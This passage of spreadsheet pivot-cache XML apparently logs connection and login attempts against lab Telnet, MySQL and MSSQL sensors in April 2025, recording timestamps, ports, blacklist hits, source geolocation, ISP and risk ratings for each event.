  <r>
    <x v="2051"/>
    <x v="2051"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T03:20:52"/>
    <d v="2025-04-13T03:20:52"/>
    <d v="2025-04-13T03:20:52"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Wimax Project"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f4:2c87"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2052"/>
    <x v="2052"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T03:19:42"/>
    <d v="2025-04-13T03:19:42"/>
    <d v="2025-04-13T03:19:42"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="01"/>
    <s v="Gilan Province"/>
    <s v="NA"/>
    <s v="Rasht"/>
    <s v="118743"/>
    <s v="NA"/>
    <s v="37.2761"/>
    <s v="49.5886"/>
    <s v="58224"/>
    <s v="TCI"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="corporate"/>
    <s v="Telecommunication Company of Gilan"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5eb:cc65"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2053"/>
    <x v="2053"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T03:06:47"/>
    <d v="2025-04-13T03:06:47"/>
    <d v="2025-04-13T03:06:47"/>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6:b56"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2054"/>
    <x v="2054"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T02:56:22"/>
    <d v="2025-04-13T02:56:22"/>
    <d v="2025-04-13T02:56:22"/>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8:663d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2055"/>
    <x v="2055"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T02:48:47"/>
    <d v="2025-04-13T02:48:47"/>
    <d v="2025-04-13T02:48:47"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BB Multiplay"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ca:4804"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2056"/>
    <x v="2056"/>
    <s v="syn-174-087-154-090.res.spectrum.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-13T02:14:15"/>
    <d v="2025-04-04T10:36:27"/>
    <d v="2025-04-13T02:14:15"/>
    <n v="218"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA&amp;&amp;39049&amp;&amp;36906"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Tulare"/>
    <s v="Porterville"/>
    <s v="5384471"/>
    <s v="93257"/>
    <s v="36.0652"/>
    <s v="-119.017"/>
    <s v="20115"/>
    <s v="Charter Communications"/>
    <s v="Charter Communications"/>
    <s v="business"/>
    <s v="Spectrum"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ae57:9a5a"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2057"/>
    <x v="2057"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T01:59:22"/>
    <d v="2025-04-13T01:59:22"/>
    <d v="2025-04-13T01:59:22"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="7552"/>
    <s v="VIETEL-AS-AP"/>
    <s v="Viettel Corporation"/>
    <s v="corporate"/>
    <s v="Viettel Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:746f:62aa"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2058"/>
    <x v="2058"/>
    <s v="node-1a6.pool-125-24.dynamic.totinternet.net"/>
    <x v="0"/>
    <d v="2025-04-13T01:48:12"/>
    <d v="2025-04-13T01:48:12"/>
    <d v="2025-04-13T01:48:12"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Bang Khun Thian"/>
    <s v="Bang Khun Thian"/>
    <s v="1619485"/>
    <s v="NA"/>
    <s v="13.663"/>
    <s v="100.434"/>
    <s v="23969"/>
    <s v="TOT-NET"/>
    <s v="TOT Public Company Limited"/>
    <s v="corporate"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2019-05-14 09:00:25"/>
    <s v="2026-05-14 09:00:25"/>
    <s v="2023-05-18 14:44:23"/>
    <s v="['CORA.NS.CLOUDFLARE.COM', 'PHIL.NS.CLOUDFLARE.COM']"/>
    <s v="GMO Internet Group, Inc. d/b/a Onamae.com"/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="None"/>
    <x v="30"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7d18:67e"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2059"/>
    <x v="2059"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T01:45:18"/>
    <d v="2025-04-13T01:45:18"/>
    <d v="2025-04-13T01:45:18"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b638:c14e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2060"/>
    <x v="2060"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T01:42:35"/>
    <d v="2025-04-13T01:42:35"/>
    <d v="2025-04-13T01:42:35"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="KIXS-AS-KR"/>
    <s v="Korea Telecom"/>
    <s v="corporate"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:70a7:424f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2061"/>
    <x v="2061"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T01:37:07"/>
    <d v="2025-04-13T01:37:07"/>
    <d v="2025-04-13T01:37:07"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783c:7edb"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2062"/>
    <x v="2062"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T01:12:40"/>
    <d v="2025-04-13T01:12:40"/>
    <d v="2025-04-13T01:12:40"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="VE"/>
    <s v="Venezuela"/>
    <s v="V"/>
    <s v="Zulia"/>
    <s v="Maracaibo Municipality"/>
    <s v="Maracaibo"/>
    <s v="3633009"/>
    <s v="NA"/>
    <s v="10.641"/>
    <s v="-71.6074"/>
    <s v="61461"/>
    <s v="AS61461"/>
    <s v="Airtek Solutions C.A."/>
    <s v="corporate"/>
    <s v="Corporacion Matrix TV CA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9cff:ddcf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2063"/>
    <x v="2063"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T01:12:21"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-13T01:12:21"/>
    <n v="131"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_DNS_H42&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;53&amp;&amp;8470"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="BG"/>
    <s v="Bulgaria"/>
    <s v="24"/>
    <s v="Stara Zagora"/>
    <s v="Kazanlak"/>
    <s v="Kazanlak (Progres)"/>
    <s v="730496"/>
    <s v="6100"/>
    <s v="42.6189"/>
    <s v="25.3898"/>
    <s v="39024"/>
    <s v="Nastech OOD"/>
    <s v="Nastech OOD"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c245:c8a6"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2064"/>
    <x v="2064"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T01:03:15"/>
    <d v="2025-04-13T01:03:15"/>
    <d v="2025-04-13T01:03:15"/>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d7:1364"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2065"/>
    <x v="2065"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T00:52:03"/>
    <d v="2025-04-13T00:33:30"/>
    <d v="2025-04-13T00:52:03"/>
    <n v="24"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Rohtak"/>
    <s v="Rohtak (Company Bagh)"/>
    <s v="1258076"/>
    <s v="124001"/>
    <s v="28.8999"/>
    <s v="76.5844"/>
    <s v="132771"/>
    <s v="Fibre Air Services Private Limited"/>
    <s v="Fibre Air Services Private Limited"/>
    <s v="business"/>
    <s v="Sdnet10"/>
    <s v="2021-06-01"/>
    <s v="SDNET10"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a7:cc42"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2066"/>
    <x v="2066"/>
    <s v="ip-37-248-192-56.multi.internet.cyfrowypolsat.pl"/>
    <x v="0"/>
    <d v="2025-04-12T23:50:59"/>
    <d v="2025-04-12T23:50:59"/>
    <d v="2025-04-12T23:50:59"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="PL"/>
    <s v="Poland"/>
    <s v="14"/>
    <s v="Mazovia"/>
    <s v="Warszawa"/>
    <s v="Warsaw (Targówek)"/>
    <s v="756135"/>
    <s v="NA"/>
    <s v="52.2625"/>
    <s v="21.0984"/>
    <s v="8374"/>
    <s v="PLUSNET"/>
    <s v="Polkomtel Sp. z o.o."/>
    <s v="consumer"/>
    <s v="Cyfrowy Polsat S.A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:25f8:c038"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2067"/>
    <x v="2067"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T23:38:31"/>
    <d v="2025-04-12T19:53:54"/>
    <d v="2025-04-12T23:38:31"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d6:fef2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2068"/>
    <x v="2068"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T23:12:21"/>
    <d v="2025-04-12T17:06:37"/>
    <d v="2025-04-12T23:12:21"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19"/>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NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cc:1511"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2069"/>
    <x v="2069"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T22:33:55"/>
    <d v="2025-04-12T22:33:55"/>
    <d v="2025-04-12T22:33:55"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:8b39"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2070"/>
    <x v="2070"/>
    <s v="ronan.probe.onyphe.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-12T22:12:42"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-12T22:12:42"/>
    <n v="131"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H34&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_DNS_H26&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MYSQL_H7&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_SMTP_H25&amp;&amp;SMA-LAB_POP3_H6&amp;&amp;SMA-LAB_POSTGRES_H13&amp;&amp;SMA-LAB_ORACLE_H28&amp;&amp;SMA-LAB_ORACLE_H44&amp;&amp;SMA-LAB_LDAP_H46&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_HTTPS_H31"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;443&amp;&amp;53&amp;&amp;4899&amp;&amp;34295&amp;&amp;3306&amp;&amp;5900&amp;&amp;11204&amp;&amp;65347&amp;&amp;25&amp;&amp;110&amp;&amp;5432&amp;&amp;1521&amp;&amp;1080&amp;&amp;NA&amp;&amp;55894&amp;&amp;21&amp;&amp;80&amp;&amp;15161"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
